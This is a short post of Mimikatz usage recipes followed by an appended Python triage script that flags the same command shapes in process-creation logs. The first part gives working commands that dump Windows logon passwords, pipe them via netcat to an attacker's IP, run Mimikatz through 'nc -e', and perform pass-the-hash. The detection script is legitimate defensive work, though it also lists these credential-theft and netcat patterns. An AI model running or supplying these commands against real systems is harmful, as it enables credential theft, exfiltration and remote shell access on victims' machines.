z0nek


1. Logging Mimikatz output:

  C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir

2. Redirecting the output to a local file:

  C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

3. Sending the output to a remote machine:

Run on the attacker:

  E:\>nc -lvp 4444

Run on the victim:

  C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.52.1 4444

192.168.52.1 is the attacker's IP.

4. Running Mimikatz remotely through nc:

Run on the victim:

  C:\>nc -lvp 443

Run on the attacker:

  E:\>nc.exe -vv 192.168.52.128 443 -e mimikatz.exe

192.168.52.128 is the victim's IP.

5. Pass-the-hash

  Privilege::debug
  sekurlsa::pth /domain:xxxx /user:xxxxx /ntlm:xxxxxx

A cmd window then pops up.
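
For defenders, an added example that is not part of the original post: a small Python triage that flags the command shapes listed above in process-creation logs (for instance Windows Security event 4688 or Sysmon event 1 with command-line logging enabled). The event records, field names and rule names are constructed for illustration.

```python
import re

# Rules keyed to the command shapes shown in this post. Matching is done on
# the arguments, so a renamed mimikatz binary is still caught.
RULES = [
    ("mimikatz-module", re.compile(
        r"\b(?:privilege::debug|sekurlsa::(?:logonpasswords|pth))\b", re.I)),
    ("pth-ntlm-arg", re.compile(r"sekurlsa::pth\b.*?/ntlm:", re.I)),
    ("pipe-to-netcat", re.compile(r"\|\s*nc(?:\.exe)?\b", re.I)),
    ("netcat-exec", re.compile(r"\bnc(?:\.exe)?\b.*\s-e\s+\S+", re.I)),
]

# Constructed process-creation records; "host" and "command_line" are
# hypothetical field names, not a real log schema.
SAMPLE_EVENTS = [
    {"host": "WS01", "command_line": 'cmd.exe /c mimikatz.exe ""privilege::debug"" '
                                     '""sekurlsa::logonpasswords full"" exit >> log.txt'},
    {"host": "WS01", "command_line": 'cmd.exe /c m.exe ""privilege::debug"" '
                                     '""sekurlsa::logonpasswords full"" exit '
                                     '| nc.exe -vv 192.168.52.1 4444'},
    {"host": "WS02", "command_line": "nc.exe -vv 192.168.52.128 443 -e mimikatz.exe"},
    {"host": "WS03", "command_line": 'mimikatz.exe privilege::debug '
                                     '"sekurlsa::pth /domain:xxxx /user:xxxxx /ntlm:xxxxxx"'},
    {"host": "WS04", "command_line": "ipconfig /all"},
]

def normalize(cmdline):
    # The doubled quotes used on this page break up the module names in the
    # raw string, so drop quotes and collapse whitespace before matching.
    return re.sub(r"\s+", " ", cmdline.replace('"', "")).strip()

def match_rules(cmdline):
    """Return the names of all rules that match one command line."""
    norm = normalize(cmdline)
    return [name for name, rx in RULES if rx.search(norm)]

def triage(events):
    """Return (host, rule names) for every event with at least one hit."""
    results = []
    for ev in events:
        hits = match_rules(ev["command_line"])
        if hits:
            results.append((ev["host"], hits))
    return results

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS):
        print(host, ", ".join(hits))
```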

